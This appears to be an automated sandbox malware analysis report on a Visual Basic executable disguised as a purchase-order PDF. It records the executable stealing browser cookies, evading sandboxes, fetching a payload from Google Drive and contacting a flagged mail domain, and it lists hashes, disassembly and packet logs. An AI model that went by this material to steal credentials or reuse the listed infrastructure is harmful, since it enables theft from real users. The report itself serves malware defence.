Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Virtualization/Sandbox Evasion341	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol123	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion341	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection12	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	34%	Virustotal		Browse
210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe	16%	ReversingLabs	Win32.Worm.Wbvb

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
fortunametals.es	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://XCD4GuOxIDpaEsq6zLmj.orgt-	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
https://XCD4GuOxIDpaEsq6zLmj.org	0%	Avira URL Cloud	safe
http://mail.fortunametals.es	0%	Avira URL Cloud	safe
https://api.ipify.org%4	0%	Avira URL Cloud	safe
http://fortunametals.es	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fortunametals.es	94.23.221.28	true	true	0%, Virustotal, Browse	unknown
drive.google.com	142.250.185.238	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false		high
mail.fortunametals.es	unknown	unknown	true		unknown
doc-14-38-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-14-38-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6et0sg0enesn34rrf8kvhhdrn/1639482750000/03916840094075221792/*/1sW9pADfhXH64ij3XW0uAfaPSES7O-x1G?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://doc-14-38-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/b7qfcdp6	CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	false		high
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://XCD4GuOxIDpaEsq6zLmj.orgt-	CasPol.exe, 0000000A.00000002.105886891663.000000001DC34000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://doc-14-38-docs.googleusercontent.com/	CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp	false		high
http://DynDns.comDynDNS	CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	CasPol.exe, 0000000A.00000002.105887665137.000000001DCB6000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102417303454.000000001FD96000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102418225133.000000001FDA3000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105892534113.000000001FD7F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/X	CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://XCD4GuOxIDpaEsq6zLmj.org	CasPol.exe, 0000000A.00000002.105886891663.000000001DC34000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887303934.000000001DC7C000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.102379089042.000000001CA81000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887059814.000000001DC52000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887359393.000000001DC85000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.105887021682.000000001DC4E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	CasPol.exe, 0000000A.00000002.105874544943.0000000000B7B000.00000004.00000020.sdmp	false		high
http://mail.fortunametals.es	CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-14-38-docs.googleusercontent.com/K	CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101443688665.0000000000C15000.00000004.00000001.sdmp	false		high
https://api.ipify.org%4	CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://fortunametals.es	CasPol.exe, 0000000A.00000002.105887107468.000000001DC58000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 0000000A.00000002.105886584690.000000001DBEE000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	CasPol.exe, 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://doc-14-38-docs.googleusercontent.com/C	CasPol.exe, 0000000A.00000002.105874843683.0000000000BBA000.00000004.00000020.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	CasPol.exe, 0000000A.00000003.101439211072.0000000000C15000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000003.101438628590.0000000000C15000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
94.23.221.28	fortunametals.es	France	16276	OVHFR	true
142.250.185.238	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	539503
Start date:	14.12.2021
Start time:	12:50:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 45s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/4@3/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 94% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 20.54.122.82 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:53:10	API Interceptor	2532x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF7DBC0B9955D431E2.TMP Download File
Process:	C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.9704190403390272
Encrypted:	false
SSDEEP:	24:rohnKifA3iuOH/AcaVRIJ0lBefVYwqDnKolnBX26:rUKifAyxAPM03wewqDKolnB
MD5:	F8A7BA0B6BDD9C33070359F2E417C6B3
SHA1:	264F7F9354D53EF8198E0EF71962290E469BEAAF
SHA-256:	8ED5A6E47FACFC9FA4FE11F98B198F7F75A3A3F8B0A3A4C56A949E6D3D3EF13A
SHA-512:	B2A39C9F4B1E6A66A95BA8BF8E899BC9D851133E083C45203EAF1DFA1DDB83437E9A79C535B33746C358C8C100EE456A8DA227CEE9BAC360896E27D6F2D8BC4A
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\frpuodz4.bqm\Chrome\Default\Cookies Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	3.758760013585961
Encrypted:	false
SSDEEP:	384:qGHsAH0UkOYBOYVOQ0fH8VnRMD+lEofbKWc9JqxYuiAAW2QBRW9TYVVox:pHO9FVISnSSlpDK9SiyBRCcS
MD5:	CFA95D988565672C785871A48B529F85
SHA1:	4D6BED615DFA00E1067E6F95F8EC6C210ADF96A7
SHA-256:	647D64A623FB1B62175441A0EF016F8B4479A64D620498644F15DD04FDFB3B24
SHA-512:	0CB69C41DBE7A482F87FAC27EDADC822928D21B6C238EBED2459CD1873B2181734CB67D3A38714C2BAB57FFAEE699CF5EBFF5ABFC3D291B6C36A8E71572CD402
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..."..................................................................."..O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\frpuodz4.bqm\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.885277653187616
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
File size:	167936
MD5:	1547238c5f89a46f4f3d448138478e05
SHA1:	b83e59cffe50f76e819731d506efd045c55aaabc
SHA256:	3e6418ff545a4ca402fd68da393fd9db7ed7e798ffed1de2fbcdbb31fa08817f
SHA512:	81b287cac12ef493bc3d8d45fefcab4e268833e8365d59c2c8c9aacd849c43f3296fbcd93ac4feff779f9380d0f8ddc1f73a0248ed5ff96309ff7736188a1fb2
SSDEEP:	1536:ggh9P8HOja+Zg/EsPdCfWGUbu8yIjJNa+I37KTqXpzV5pkNXuUAnX:gG9P8u7ZQmeGUbUIjJNS7hXvUAnX
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\.......%.......Rich............................PE..L...+..J.................`...P......\........p....@

File Icon


Icon Hash:	93f1e0c8d2e4f9fb

Static PE Info

General
Entrypoint:	0x40195c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4AAB2E2B [Sat Sep 12 05:14:19 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e7597de960f525af7c9e8aa5873fcec3

Entrypoint Preview

Instruction
push 00402000h
call 00007F6B104BB635h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
stosb
adc eax, 226C9C5Ch
test dword ptr [esi-59h], eax
jmp edx
ret
jl 00007F6B104BB69Bh
mov byte ptr [000000A5h], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+41h], dl
push esi
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or al, bh
mov dword ptr [ebp+esi*4-58h], eax
int DFh
dec edx
add dword ptr [esi+1Eh], FFFFFFA6h
call far 03C9h : 4BBA39D8h
pop ebx
or eax, dword ptr [ebp+70A34C87h]
push cs
and ecx, esi
mov dl, 96h
imul edi, dword ptr [edx], 9933AD4Fh
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cli
add eax, 04C70000h
add byte ptr [eax], al
add byte ptr [eax+eax], al
dec ebp
inc ebp
push esp
inc ecx
add byte ptr [41000601h], cl
jc 00007F6B104BB6A5h
push 19006964h
add dword ptr [eax], eax
inc edx
add byte ptr [ebx], ah
xchg byte ptr [eax+eax], al
add byte ptr [esp+esi*2+00h], ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26414	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2b000	0x850	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x24c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25ba0	0x26000	False	0.558214689556	data	7.13735500913	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x27000	0x36e4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2b000	0x850	0x1000	False	0.322021484375	data	3.0856399087	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2b3e8	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2b3d4	0x14	data
RT_VERSION	0x2b0f0	0x2e4	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarSub, __vbaR8FixI4, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaHresultCheck, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, __vbaObjVar, __vbaStrR4, _adj_fpatan, __vbaRedim, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaInStr, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, __vbaVarTstGe, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Templafy
InternalName	Lydbl
FileVersion	2.00
CompanyName	Templafy
LegalTrademarks	Templafy
Comments	Templafy
ProductName	Templafy
ProductVersion	2.00
FileDescription	Templafy
OriginalFilename	Lydbl.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2021 12:52:58.761425972 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.761440039 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:58.761614084 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.776757956 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.776766062 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:58.812968016 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:58.813180923 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.813664913 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:58.813842058 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.944648027 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.945416927 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:58.945565939 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.957485914 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:58.999851942 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:59.369378090 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:59.369570971 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:59.369616985 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:59.369760036 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:59.369802952 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:59.369975090 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:59.431087971 CET	49814	443	192.168.11.20	142.250.185.238
Dec 14, 2021 12:52:59.431152105 CET	443	49814	142.250.185.238	192.168.11.20
Dec 14, 2021 12:52:59.539587021 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.539674997 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.539840937 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.540361881 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.540414095 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.589179039 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.589371920 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.589389086 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.590720892 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.590948105 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.595238924 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.595256090 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.595520973 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.595695972 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.596134901 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.639861107 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.829015017 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.829163074 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.829202890 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.829874992 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.829992056 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.830065012 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.830615997 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.830812931 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.830831051 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.832007885 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.832250118 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.832274914 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.832284927 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.832303047 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.832544088 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.832794905 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.832947969 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.832968950 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.833240986 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.839509010 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.839711905 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.839746952 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.839943886 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.839972019 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.840234041 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.840270042 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.840569019 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.840625048 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.840827942 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.840856075 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.841098070 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.841324091 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.841531038 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.841552019 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.841792107 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.842132092 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.842283964 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.842315912 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.842513084 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.842839003 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.843039036 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.843069077 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.843218088 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.843554020 CET	443	49815	142.250.185.161	192.168.11.20
Dec 14, 2021 12:52:59.843755007 CET	49815	443	192.168.11.20	142.250.185.161
Dec 14, 2021 12:52:59.843776941 CET	443	49815	142.250.185.161	192.168.11.20
